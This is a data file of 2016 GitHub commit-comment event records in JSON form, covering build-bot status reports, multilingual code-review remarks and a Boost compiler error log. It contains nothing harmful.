{"id":"4509106865","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18881961,"position":null,"line":null,"path":null,"commit_id":"231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9","created_at":"2016-09-02T15:18:56Z","updated_at":"2016-09-02T15:18:56Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1187 of 1187 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-02T15:18:56Z"}
{"id":"4509108817","type":"CommitCommentEvent","actor":{"login":"adowsky"},"repo":{"name":"THerman95/JOGL-Test"},"payload":{"comment":{"id":18881964,"position":214,"line":165,"path":"JOGL-Test/src/com/therman/test/Test.java","commit_id":"777348afc0005362d9c4c2792a92b4e82af36a48","created_at":"2016-09-02T15:19:18Z","updated_at":"2016-09-02T15:19:18Z","body":"Skoro jesteś w stanie podzielić metodę na sekcje(po komentarzach) to równie dobrze możesz wydzielić je jako osobne metody np. prywatne i tylko te 2 metody wywołać tutaj. Dzielisz kod, jest wtedy czytelniej."}},"created_at":"2016-09-02T15:19:18Z"}
{"id":"4509109111","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18881965,"position":null,"line":null,"path":null,"commit_id":"3edd99c7d2a6734f27670102a9a5338cf06b77f1","created_at":"2016-09-02T15:19:21Z","updated_at":"2016-09-02T15:19:21Z","body":"The following doc(s) have been deployed to the [rmwordpres](https://rmwordpres-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-wordpress-duplicator](https://rmwordpres-static-docs.pantheonsite.io/docs/migrate-wordpress-duplicator)\n"}},"created_at":"2016-09-02T15:19:21Z"}
{"id":"4509111705","type":"CommitCommentEvent","actor":{"login":"mstevetodd"},"repo":{"name":"JMRI/JMRI"},"payload":{"comment":{"id":18881971,"position":16,"line":51,"path":"java/src/jmri/NamedBeanHandleManager.java","commit_id":"6b19b45d65f8663b2ac010d839f1ae9c45344d7f","created_at":"2016-09-02T15:19:47Z","updated_at":"2016-09-02T15:19:47Z","body":"OK, I _think_ it is coming from rt.jar. Here is the code I see when I \"Open Declaration\" on the @CheckForNull\r\n\r\n```\r\npackage javax.annotation;\r\n\r\nimport java.lang.annotation.Documented;\r\nimport java.lang.annotation.Retention;\r\nimport java.lang.annotation.RetentionPolicy;\r\n\r\nimport javax.annotation.meta.TypeQualifierNickname;\r\nimport javax.annotation.meta.When;\r\n\r\n@Documented\r\n@TypeQualifierNickname\r\n@Nonnull(when = When.MAYBE)\r\n@Retention(RetentionPolicy.RUNTIME)\r\npublic @interface CheckForNull {\r\n\r\n}\r\n```"}},"created_at":"2016-09-02T15:19:47Z"}
{"id":"4509112009","type":"CommitCommentEvent","actor":{"login":"juliotoscano"},"repo":{"name":"amadeusproject/uxdesign-html"},"payload":{"comment":{"id":18881973,"position":null,"line":null,"path":null,"commit_id":"68482b541acbaf74d8d5e0c9eb6ef299d0cf1df4","created_at":"2016-09-02T15:19:51Z","updated_at":"2016-09-02T15:19:51Z","body":"Padronizando com outras telas HOME."}},"created_at":"2016-09-02T15:19:51Z"}
{"id":"4509114338","type":"CommitCommentEvent","actor":{"login":"zaharovklim"},"repo":{"name":"zaharovklim/tkt"},"payload":{"comment":{"id":18881978,"position":27,"line":107,"path":"backend/apps/api/views.py","commit_id":"5ed8f8e963bbf190334331bc9e13f96a7057a969","created_at":"2016-09-02T15:20:17Z","updated_at":"2016-09-02T15:20:17Z","body":"Этот класс реализует шаблон примесь. Стоит отразить это в названии, например MailchimpRequestMixin"}},"created_at":"2016-09-02T15:20:17Z"}
{"id":"4509118814","type":"CommitCommentEvent","actor":{"login":"adowsky"},"repo":{"name":"THerman95/JOGL-Test"},"payload":{"comment":{"id":18881994,"position":98,"line":92,"path":"JOGL-Test/src/com/therman/test/Test.java","commit_id":"777348afc0005362d9c4c2792a92b4e82af36a48","created_at":"2016-09-02T15:21:02Z","updated_at":"2016-09-02T15:21:02Z","body":"w jakim celu jest jest to wyodrębnione jako blok kodu? te nawiasy są tu potrzebne? wydają się zbędne."}},"created_at":"2016-09-02T15:21:02Z"}
{"id":"4509118852","type":"CommitCommentEvent","actor":{"login":"melix"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18881995,"position":null,"line":null,"path":null,"commit_id":"340421a4ca32dd1c7aa72f9c02ded86c4ced9f5d","created_at":"2016-09-02T15:21:02Z","updated_at":"2016-09-02T15:21:02Z","body":":+1: "}},"created_at":"2016-09-02T15:21:02Z"}
{"id":"4509119785","type":"CommitCommentEvent","actor":{"login":"DLvalentine"},"repo":{"name":"DLvalentine/GSX"},"payload":{"comment":{"id":18881997,"position":20,"line":20,"path":"GSX_Windows.pl","commit_id":"9b5e5b65804f6ffb31711465239d73563f348406","created_at":"2016-09-02T15:21:14Z","updated_at":"2016-09-02T15:21:14Z","body":"This is where the major changes were made. Removed `-A \"*.jpg\"` from `$grabString`\r\n\r\nFor some reason, *nix and Mac handle that just fine, but the wget.exe packaged with GOW will reject and delete the image because it doesn't exactly match the file type we were going for. "}},"created_at":"2016-09-02T15:21:14Z"}
{"id":"4509124235","type":"CommitCommentEvent","actor":{"login":"Kojoley"},"repo":{"name":"boostorg/fusion"},"payload":{"comment":{"id":18882003,"position":null,"line":null,"path":null,"commit_id":"79d8e9d11c07099bdf1db0724e8fb1ee92e98920","created_at":"2016-09-02T15:22:02Z","updated_at":"2016-09-02T15:22:02Z","body":"This commit have broken Boost.Spirit\r\n\r\n```\r\nIn file included from center_alignment.cpp:9:\r\nIn file included from ../../../../boost/spirit/include/karma_char.hpp:16:\r\nIn file included from ../../../../boost/spirit/home/karma/char.hpp:13:\r\nIn file included from ../../../../boost/spirit/home/karma/char/char.hpp:14:\r\nIn file included from ../../../../boost/spirit/home/support/common_terminals.hpp:15:\r\nIn file included from ../../../../boost/spirit/home/support/terminal.hpp:17:\r\nIn file included from ../../../../boost/spirit/include/phoenix_core.hpp:11:\r\nIn file included from ../../../../boost/phoenix/core.hpp:13:\r\nIn file included from ../../../../boost/phoenix/core/debug.hpp:17:\r\nIn file included from ../../../../boost/proto/proto.hpp:12:\r\nIn file included from ../../../../boost/proto/core.hpp:21:\r\nIn file included from ../../../../boost/proto/fusion.hpp:22:\r\nIn file included from ../../../../boost/fusion/include/intrinsic.hpp:11:\r\nIn file included from ../../../../boost/fusion/sequence/intrinsic.hpp:23:\r\nIn file included from ../../../../boost/fusion/sequence/intrinsic/swap.hpp:15:\r\nIn file included from ../../../../boost/fusion/view/zip_view.hpp:12:\r\nIn file included from ../../../../boost/fusion/view/zip_view/zip_view.hpp:16:\r\nIn file included from ../../../../boost/fusion/view/zip_view/detail/begin_impl.hpp:14:\r\nIn file included from ../../../../boost/fusion/algorithm/transformation/transform.hpp:11:\r\nIn file included from ../../../../boost/fusion/view/transform_view/transform_view.hpp:22:\r\nIn file included from ../../../../boost/fusion/container/vector/vector10.hpp:25:\r\n../../../../boost/fusion/container/vector/vector.hpp:175:19: error: no matching constructor for initialization of 'boost::proto::exprns_::expr<boost::proto::tagns_::tag::terminal, boost::proto::argsns_::term<boost::spirit::terminal_ex<boost::spirit::tag::char_code<boost::spirit::tag::char_, boost::spirit::char_encoding::ascii>, boost::fusion::vector<char> > >, 0>'\r\n                : elem(std::forward<U>(rhs))\r\n                  ^    ~~~~~~~~~~~~~~~~~~~~\r\n../../../../boost/fusion/container/vector/vector.hpp:228:19: note: in instantiation of function template specialization 'boost::fusion::vector_detail::store<0, boost::proto::exprns_::expr<boost::proto::tagns_::tag::terminal, boost::proto::argsns_::term<boost::spirit::terminal_ex<boost::spirit::tag::char_code<boost::spirit::tag::char_, boost::spirit::char_encoding::ascii>, boost::fusion::vector<char> > >, 0> >::store<const boost::spirit::terminal_ex<boost::spirit::tag::char_code<boost::spirit::tag::char_, boost::spirit::char_encoding::ascii>, boost::fusion::vector<char> > &>' requested here\r\n                : store<I, T>(forward_at_c<I>(rhs))...\r\n                  ^\r\n../../../../boost/fusion/container/vector/vector.hpp:310:15: note: in instantiation of function template specialization 'boost::fusion::vector_detail::vector_data<std::integer_sequence<unsigned long, 0>, boost::proto::exprns_::expr<boost::proto::tagns_::tag::terminal, boost::proto::argsns_::term<boost::spirit::terminal_ex<boost::spirit::tag::char_code<boost::spirit::tag::char_, boost::spirit::char_encoding::ascii>, boost::fusion::vector<char> > >, 0> >::vector_data<const boost::proto::exprns_::expr<boost::proto::tagns_::tag::terminal, boost::proto::argsns_::term<boost::spirit::terminal_ex<boost::spirit::tag::char_code<boost::spirit::tag::char_, boost::spirit::char_encoding::ascii>, boost::fusion::vector<char> > >, 0> &>' requested here\r\n            : base(vector_detail::dispatch<vector>(std::forward<U>(u)...), std::forward<U>(u)...)\r\n              ^\r\n../../../../boost/fusion/container/generation/make_vector.hpp:48:16: note: in instantiation of function template specialization 'boost::fusion::vector<boost::proto::exprns_::expr<boost::proto::tagns_::tag::terminal, boost::proto::argsns_::term<boost::spirit::terminal_ex<boost::spirit::tag::char_code<boost::spirit::tag::char_, boost::spirit::char_encoding::ascii>, boost::fusion::vector<char> > >, 0> >::vector<const boost::proto::exprns_::expr<boost::proto::tagns_::tag::terminal, boost::proto::argsns_::term<boost::spirit::terminal_ex<boost::spirit::tag::char_code<boost::spirit::tag::char_, boost::spirit::char_encoding::ascii>, boost::fusion::vector<char> > >, 0> &>' requested here\r\n        return typename result_of::make_vector<T...>::type(std::forward<T>(arg)...);\r\n               ^\r\ncenter_alignment.cpp:45:45: note: in instantiation of function template specialization 'boost::spirit::terminal<boost::spirit::tag::center>::operator()<boost::proto::exprns_::expr<boost::proto::tagns_::tag::terminal, boost::proto::argsns_::term<boost::spirit::terminal_ex<boost::spirit::tag::char_code<boost::spirit::tag::char_, boost::spirit::char_encoding::ascii>, boost::fusion::vector<char> > >, 0> >' requested here\r\n        BOOST_TEST(test(\"*****x****\", center(char_('*'))[char_('x')]));\r\n                                            ^\r\n../../../../boost/core/lightweight_test.hpp:146:28: note: expanded from macro 'BOOST_TEST'\r\n#define BOOST_TEST(expr) ((expr)? (void)0: ::boost::detail::test_failed_impl(#expr, __FILE__, __LINE__, BOOST_CURRENT_FUNCTION))\r\n                           ^\r\n../../../../boost/proto/detail/preprocessed/expr_variadic.hpp:37:12: note: candidate constructor (the implicit copy constructor) not viable: no known conversion from 'const boost::spirit::terminal_ex<boost::spirit::tag::char_code<boost::spirit::tag::char_, boost::spirit::char_encoding::ascii>, boost::fusion::vector<char> >' to 'const boost::proto::exprns_::expr<boost::proto::tagns_::tag::terminal, boost::proto::argsns_::term<boost::spirit::terminal_ex<boost::spirit::tag::char_code<boost::spirit::tag::char_, boost::spirit::char_encoding::ascii>, boost::fusion::vector<char> > >, 0>' for 1st argument\r\n    struct expr<Tag, term<Arg0>, 0>\r\n           ^\r\n../../../../boost/proto/detail/preprocessed/expr_variadic.hpp:37:12: note: candidate constructor (the implicit default constructor) not viable: requires 0 arguments, but 1 was provided\r\n1 error generated.\r\n\r\n  \"clang++\" -c -x c++ -ftemplate-depth-512 -ftemplate-depth=512 -O0 -g -fno-inline -Wall -g -std=c++1y -Wno-invalid-source-encoding --coverage -fPIC -m64 -ftemplate-depth-512 -ftemplate-depth=512 -DBOOST_ALL_NO_LIB=1 -DBOOST_RESULT_OF_USE_TR1 -I\".\" -I\"..\" -I\"../../../..\" -o \"../../../../bin.v2/libs/spirit/test/karma/karma_center_alignment-p3.test/clang-linux-c1y/debug/center_alignment.o\" \"center_alignment.cpp\"\r\n```\r\n```\r\nIn file included from pattern4.cpp:12:\r\nIn file included from ../../../../boost/spirit/include/karma_operator.hpp:16:\r\nIn file included from ../../../../boost/spirit/home/karma/operator.hpp:13:\r\nIn file included from ../../../../boost/spirit/home/karma/operator/sequence.hpp:14:\r\nIn file included from ../../../../boost/spirit/home/karma/domain.hpp:15:\r\nIn file included from ../../../../boost/spirit/home/support/meta_compiler.hpp:19:\r\nIn file included from ../../../../boost/proto/proto.hpp:12:\r\nIn file included from ../../../../boost/proto/core.hpp:21:\r\nIn file included from ../../../../boost/proto/fusion.hpp:22:\r\nIn file included from ../../../../boost/fusion/include/intrinsic.hpp:11:\r\nIn file included from ../../../../boost/fusion/sequence/intrinsic.hpp:23:\r\nIn file included from ../../../../boost/fusion/sequence/intrinsic/swap.hpp:15:\r\nIn file included from ../../../../boost/fusion/view/zip_view.hpp:12:\r\nIn file included from ../../../../boost/fusion/view/zip_view/zip_view.hpp:16:\r\nIn file included from ../../../../boost/fusion/view/zip_view/detail/begin_impl.hpp:14:\r\nIn file included from ../../../../boost/fusion/algorithm/transformation/transform.hpp:11:\r\nIn file included from ../../../../boost/fusion/view/transform_view/transform_view.hpp:22:\r\nIn file included from ../../../../boost/fusion/container/vector/vector10.hpp:25:\r\n../../../../boost/fusion/container/vector/vector.hpp:175:19: error: no matching constructor for initialization of 'boost::phoenix::actor<boost::spirit::attribute<3> >'\r\n                : elem(std::forward<U>(rhs))\r\n                  ^    ~~~~~~~~~~~~~~~~~~~~\r\n../../../../boost/fusion/container/vector/vector.hpp:228:19: note: in instantiation of function template specialization 'boost::fusion::vector_detail::store<0, boost::phoenix::actor<boost::spirit::attribute<3> > >::store<const boost::spirit::attribute<3> &>' requested here\r\n                : store<I, T>(forward_at_c<I>(rhs))...\r\n                  ^\r\n../../../../boost/fusion/container/vector/vector.hpp:310:15: note: in instantiation of function template specialization 'boost::fusion::vector_detail::vector_data<std::integer_sequence<unsigned long, 0>, boost::phoenix::actor<boost::spirit::attribute<3> > >::vector_data<const boost::phoenix::actor<boost::spirit::attribute<3> > &>' requested here\r\n            : base(vector_detail::dispatch<vector>(std::forward<U>(u)...), std::forward<U>(u)...)\r\n              ^\r\n../../../../boost/fusion/container/generation/make_vector.hpp:48:16: note: in instantiation of function template specialization 'boost::fusion::vector<boost::phoenix::actor<boost::spirit::attribute<3> > >::vector<const boost::phoenix::actor<boost::spirit::attribute<3> > &>' requested here\r\n        return typename result_of::make_vector<T...>::type(std::forward<T>(arg)...);\r\n               ^\r\npattern4.cpp:55:38: note: in instantiation of function template specialization 'boost::spirit::karma::rule<std::back_insert_iterator<std::basic_string<char> >, void (double), boost::spirit::unused_type, boost::spirit::unused_type, boost::spirit::unused_type>::operator()<boost::phoenix::actor<boost::spirit::attribute<3> > >' requested here\r\n        start = a(_r1) << b(_r2) << c(_r3);\r\n                                     ^\r\n../../../../boost/phoenix/core/actor.hpp:192:12: note: candidate constructor (the implicit copy constructor) not viable: no known conversion from 'const boost::spirit::attribute<3>' to 'const boost::phoenix::actor<boost::spirit::attribute<3> >' for 1st argument\r\n    struct actor\r\n           ^\r\n../../../../boost/phoenix/core/actor.hpp:192:12: note: candidate constructor (the implicit default constructor) not viable: requires 0 arguments, but 1 was provided\r\n3 errors generated.\r\n\r\n  \"clang++\" -c -x c++ -ftemplate-depth-512 -ftemplate-depth=512 -O0 -g -fno-inline -Wall -g -std=c++1y -Wno-invalid-source-encoding --coverage -fPIC -m64 -ftemplate-depth-512 -ftemplate-depth=512 -DBOOST_ALL_NO_LIB=1 -DBOOST_RESULT_OF_USE_TR1 -I\".\" -I\"..\" -I\"../../../..\" -o \"../../../../bin.v2/libs/spirit/test/karma/karma_pattern4-p3.test/clang-linux-c1y/debug/pattern4.o\" \"pattern4.cpp\"\r\n```\r\n\r\nBroken tests after the commit are:\r\n  - karma_columns\r\n  - karma_center_alignment\r\n  - karma_left_alignment\r\n  - karma_right_alignment\r\n  - karma_regression_center_alignment\r\n  - karma_pattern4 \r\n\r\n\r\nHere is the [bisect log](https://github.com/boostorg/fusion/files/452315/bisect-log.txt)\r\n"}},"created_at":"2016-09-02T15:22:02Z"}
{"id":"4509127035","type":"CommitCommentEvent","actor":{"login":"jfdenise"},"repo":{"name":"soul2zimate/wildfly-core"},"payload":{"comment":{"id":18882018,"position":96,"line":96,"path":"testsuite/standalone/src/test/java/org/jboss/as/test/integration/management/cli/VariablesCompletionTestCase.java","commit_id":"dcf00869f1faa2e6f133e8b656481cb7ed604a12","created_at":"2016-09-02T15:22:32Z","updated_at":"2016-09-02T15:22:32Z","body":"Why do you have both FOO_NAME and FOO_BAR ? You should only have /, : and foobar\r\n"}},"created_at":"2016-09-02T15:22:32Z"}
{"id":"4509127673","type":"CommitCommentEvent","actor":{"login":"MarkMangoba"},"repo":{"name":"python/pythondotorg"},"payload":{"comment":{"id":18882020,"position":null,"line":null,"path":null,"commit_id":"4ec134c173e6ee6f6cb8ec36567799e4c619e5af","created_at":"2016-09-02T15:22:40Z","updated_at":"2016-09-02T15:22:40Z","body":"@berkerpeksag thanks!  I'll actually go over this with @bwaliszewski on this process."}},"created_at":"2016-09-02T15:22:40Z"}
{"id":"4509130440","type":"CommitCommentEvent","actor":{"login":"jfdenise"},"repo":{"name":"wildfly/wildfly-core"},"payload":{"comment":{"id":18882022,"position":96,"line":96,"path":"testsuite/standalone/src/test/java/org/jboss/as/test/integration/management/cli/VariablesCompletionTestCase.java","commit_id":"dcf00869f1faa2e6f133e8b656481cb7ed604a12","created_at":"2016-09-02T15:23:10Z","updated_at":"2016-09-02T15:23:10Z","body":"Why do you have both FOO_NAME and FOO_BAR ? You should only have /, : and foobar"}},"created_at":"2016-09-02T15:23:10Z"}
{"id":"4509131384","type":"CommitCommentEvent","actor":{"login":"baschny"},"repo":{"name":"georgringer/TYPO3CMS-Reference-TCA"},"payload":{"comment":{"id":18882024,"position":null,"line":null,"path":null,"commit_id":"4d6fdcdc6a96e414dcdb6ad723325504c514900d","created_at":"2016-09-02T15:23:19Z","updated_at":"2016-09-02T15:23:19Z","body":"@georgringer if I see it correctly, those two changes are not part of 8.3 but are in master-only (for 8.4 later on), so we don't need / want to document that just yet (only for the 8.4 release). Can you confirm?"}},"created_at":"2016-09-02T15:23:19Z"}
{"id":"4509132011","type":"CommitCommentEvent","actor":{"login":"adowsky"},"repo":{"name":"THerman95/JOGL-Test"},"payload":{"comment":{"id":18882028,"position":62,"line":62,"path":"JOGL-Test/src/com/therman/engine/Graphics/Camera.java","commit_id":"777348afc0005362d9c4c2792a92b4e82af36a48","created_at":"2016-09-02T15:23:25Z","updated_at":"2016-09-02T15:23:25Z","body":"fP? mówi to tyle że nic nie mówi. Staraj się nie stosować nieczytelnych, znanych tylko sobie skrótowców, a raczej pełne formy. Szczególnie w nazwach metod."}},"created_at":"2016-09-02T15:23:25Z"}
{"id":"4509135204","type":"CommitCommentEvent","actor":{"login":"ywj"},"repo":{"name":"ywj/ebook"},"payload":{"comment":{"id":18882041,"position":null,"line":null,"path":null,"commit_id":"df387937c42860b391194a40460872aea788bc8b","created_at":"2016-09-02T15:23:59Z","updated_at":"2016-09-02T15:23:59Z","body":"well done"}},"created_at":"2016-09-02T15:23:59Z"}
{"id":"4509137235","type":"CommitCommentEvent","actor":{"login":"tienthanhdhcn"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":18882049,"position":136,"line":153,"path":"pokemongo_bot/cell_workers/pokemon_catch_worker.py","commit_id":"838fea4298b79acfac07447d8328a4672b583667","created_at":"2016-09-02T15:24:23Z","updated_at":"2016-09-02T15:24:23Z","body":"need to be deleted "}},"created_at":"2016-09-02T15:24:23Z"}
{"id":"4509138210","type":"CommitCommentEvent","actor":{"login":"ywj"},"repo":{"name":"ywj/ebook"},"payload":{"comment":{"id":18882053,"position":null,"line":null,"path":null,"commit_id":"df387937c42860b391194a40460872aea788bc8b","created_at":"2016-09-02T15:24:33Z","updated_at":"2016-09-02T15:24:33Z","body":"well done\r\n===="}},"created_at":"2016-09-02T15:24:33Z"}
{"id":"4509140481","type":"CommitCommentEvent","actor":{"login":"huseyinuri"},"repo":{"name":"huseyinuri/meteor-tuts"},"payload":{"comment":{"id":18882057,"position":null,"line":null,"path":null,"commit_id":"99a61d2e57be3c5a025e3c9212fbc2ddf7c9b548","created_at":"2016-09-02T15:24:57Z","updated_at":"2016-09-02T15:24:57Z","body":"\"meteor add momentjs: moment\" ile paket yüklemesi yapıldı. \r\n\"meteor list\" ile yüklü paketler kontrol edilir."}},"created_at":"2016-09-02T15:24:57Z"}
{"id":"4509140878","type":"CommitCommentEvent","actor":{"login":"DirtyF"},"repo":{"name":"antoinentl/frank.taillandier.me"},"payload":{"comment":{"id":18882059,"position":null,"line":null,"path":null,"commit_id":"d5e7a2db0b6a9586a1396a7b182e51fd6b3d1038","created_at":"2016-09-02T15:25:01Z","updated_at":"2016-09-02T15:25:01Z","body":"@antoinentl ❤️  merci pour les corrections, j'ai rapatrié tes corrections 🎉 "}},"created_at":"2016-09-02T15:25:01Z"}
{"id":"4509141753","type":"CommitCommentEvent","actor":{"login":"adowsky"},"repo":{"name":"THerman95/JOGL-Test"},"payload":{"comment":{"id":18882061,"position":12,"line":12,"path":"JOGL-Test/src/com/therman/engine/Graphics/Render.java","commit_id":"23d4b58d062023a509c9e506154069a03d6d22f9","created_at":"2016-09-02T15:25:12Z","updated_at":"2016-09-02T15:25:12Z","body":"W jakim celu jest tworzony konstruktor z parametrem, skoro argument nie jest potem użyty?"}},"created_at":"2016-09-02T15:25:12Z"}
{"id":"4509141838","type":"CommitCommentEvent","actor":{"login":"huseyinuri"},"repo":{"name":"huseyinuri/meteor-tuts"},"payload":{"comment":{"id":18882062,"position":null,"line":null,"path":null,"commit_id":"99a61d2e57be3c5a025e3c9212fbc2ddf7c9b548","created_at":"2016-09-02T15:25:13Z","updated_at":"2016-09-02T15:25:13Z","body":"`aasdas`"}},"created_at":"2016-09-02T15:25:13Z"}
{"id":"4509144360","type":"CommitCommentEvent","actor":{"login":"trentxintong"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18882070,"position":null,"line":null,"path":null,"commit_id":"bd731cfff05445cba6320c4e18071c2b1827eec0","created_at":"2016-09-02T15:25:37Z","updated_at":"2016-09-02T15:25:37Z","body":"LGTM"}},"created_at":"2016-09-02T15:25:37Z"}
{"id":"4509144483","type":"CommitCommentEvent","actor":{"login":"Kristjansson"},"repo":{"name":"LabKey/cds"},"payload":{"comment":{"id":18882072,"position":17,"line":114,"path":"test/src/org/labkey/test/pages/cds/LearnGrid.java","commit_id":"3cc998fb9aa88a0f2f6cb24019b9894dc97ecd2a","created_at":"2016-09-02T15:25:39Z","updated_at":"2016-09-02T15:25:39Z","body":"Scrolling into view is required because the overflow for the grid is hidden. So selenium decides to throw an error when selecting text from an element currently off screen. See: https://github.com/seleniumhq/selenium-google-code-issue-archive/issues/6415"}},"created_at":"2016-09-02T15:25:39Z"}
{"id":"4509147075","type":"CommitCommentEvent","actor":{"login":"adowsky"},"repo":{"name":"THerman95/JOGL-Test"},"payload":{"comment":{"id":18882077,"position":15,"line":31,"path":"JOGL-Test/src/com/therman/engine/Inputs/KeyboardListener.java","commit_id":"23d4b58d062023a509c9e506154069a03d6d22f9","created_at":"2016-09-02T15:26:10Z","updated_at":"2016-09-02T15:26:10Z","body":"powinny być klamry. Pozwala to uniknąć potem niepotrzbnych błędów, które ciężko wyłapać."}},"created_at":"2016-09-02T15:26:10Z"}
{"id":"4509148022","type":"CommitCommentEvent","actor":{"login":"octref"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18882080,"position":null,"line":null,"path":null,"commit_id":"152e0b04a7a2de37358da53287cbad346c0182b8","created_at":"2016-09-02T15:26:18Z","updated_at":"2016-09-02T15:26:18Z","body":"@alexandrudima \r\n\r\nSounds good. Thanks for the explanation!"}},"created_at":"2016-09-02T15:26:18Z"}
{"id":"4509148976","type":"CommitCommentEvent","actor":{"login":"Shamauk"},"repo":{"name":"Shamauk/Atomic-Test-001"},"payload":{"comment":{"id":18882084,"position":3,"line":2,"path":"README.md","commit_id":"cdb02a7341006bfec22bbf61f5014b633c7e2d0c","created_at":"2016-09-02T15:26:29Z","updated_at":"2016-09-02T15:26:29Z","body":"Update 0.011"}},"created_at":"2016-09-02T15:26:29Z"}
{"id":"4509150667","type":"CommitCommentEvent","actor":{"login":"geopet"},"repo":{"name":"johnsinco/angular"},"payload":{"comment":{"id":18882087,"position":7,"line":7,"path":"config/initializers/secret_token.rb","commit_id":"33ee81f88fae415c5418f991a5647567d6155270","created_at":"2016-09-02T15:26:46Z","updated_at":"2016-09-02T15:26:46Z","body":"@johnsinco: I have been asked to pass along a message regarding this secret token from 2013.\r\n\r\nYour friends from the DKPR appreciate your compliance in sending this secret to us. We are using it to help thwart the oppressive sweaty palm of American capitalistic consumerism in the iTunes App and Google Play stores respectively.\r\n\r\nKeep giving us all the secrets, @johnsinco. Don't ever stop."}},"created_at":"2016-09-02T15:26:46Z"}
{"id":"4509152782","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18882091,"position":null,"line":null,"path":null,"commit_id":"5d4225117607c932f614bea7a20004fe5eecdecd","created_at":"2016-09-02T15:27:10Z","updated_at":"2016-09-02T15:27:10Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 908](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12430&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:55"}},"created_at":"2016-09-02T15:27:10Z"}
{"id":"4509153318","type":"CommitCommentEvent","actor":{"login":"primaeval"},"repo":{"name":"vonH/plugin.video.iplayerwww"},"payload":{"comment":{"id":18882093,"position":null,"line":null,"path":null,"commit_id":"8f9ce19c413677bc093e38419f2642c0478661f9","created_at":"2016-09-02T15:27:16Z","updated_at":"2016-09-02T15:27:16Z","body":"I thought License looked wrong but the spell checker said ok. I didn't know it was a verb though."}},"created_at":"2016-09-02T15:27:16Z"}
{"id":"4509154386","type":"CommitCommentEvent","actor":{"login":"brantwynn"},"repo":{"name":"acquia/df"},"payload":{"comment":{"id":18882094,"position":7,"line":153,"path":"composer.json","commit_id":"302b4d9b754135c158fe4c392e9bbb7d001cd2bc","created_at":"2016-09-02T15:27:27Z","updated_at":"2016-09-02T15:27:27Z","body":"Can you put this on drupal.org in the df issue queue?"}},"created_at":"2016-09-02T15:27:27Z"}
{"id":"4509154603","type":"CommitCommentEvent","actor":{"login":"adowsky"},"repo":{"name":"THerman95/JOGL-Test"},"payload":{"comment":{"id":18882096,"position":149,"line":432,"path":"JOGL-Test/src/com/therman/engine/Maths/Matrix4f.java","commit_id":"23d4b58d062023a509c9e506154069a03d6d22f9","created_at":"2016-09-02T15:27:29Z","updated_at":"2016-09-02T15:27:29Z","body":"@Override"}},"created_at":"2016-09-02T15:27:29Z"}
{"id":"4509156637","type":"CommitCommentEvent","actor":{"login":"adowsky"},"repo":{"name":"THerman95/JOGL-Test"},"payload":{"comment":{"id":18882099,"position":3,"line":109,"path":"JOGL-Test/src/com/therman/engine/Maths/Vector3f.java","commit_id":"23d4b58d062023a509c9e506154069a03d6d22f9","created_at":"2016-09-02T15:27:48Z","updated_at":"2016-09-02T15:27:48Z","body":"@Override"}},"created_at":"2016-09-02T15:27:48Z"}
{"id":"4509161162","type":"CommitCommentEvent","actor":{"login":"meltsufin"},"repo":{"name":"GoogleCloudPlatform/appengine-plugins-core"},"payload":{"comment":{"id":18882107,"position":null,"line":null,"path":null,"commit_id":"786786290255c3ea460ad19b9723f49af52d0336","created_at":"2016-09-02T15:28:34Z","updated_at":"2016-09-02T15:28:34Z","body":"@loosebazooka  PTAL"}},"created_at":"2016-09-02T15:28:34Z"}
{"id":"4509163849","type":"CommitCommentEvent","actor":{"login":"zaharovklim"},"repo":{"name":"zaharovklim/tkt"},"payload":{"comment":{"id":18882115,"position":30,"line":110,"path":"backend/apps/api/views.py","commit_id":"5ed8f8e963bbf190334331bc9e13f96a7057a969","created_at":"2016-09-02T15:29:04Z","updated_at":"2016-09-02T15:29:04Z","body":"Зачем подавляются ворнинги requests?"}},"created_at":"2016-09-02T15:29:04Z"}
{"id":"4509167969","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18882126,"position":34,"line":58,"path":"src/librustc_incremental/persist/directory.rs","commit_id":"8a17f7ab8a09008d4e8bc88c75f1286d3ff6aa63","created_at":"2016-09-02T15:29:49Z","updated_at":"2016-09-02T15:29:49Z","body":"Nit: we should do `{}/{}`, or else use `(String, String)`, for the key type, so as to prevent a collision between `(\"ab\", \"c\")` vs `(\"a\", \"bc\")`."}},"created_at":"2016-09-02T15:29:49Z"}
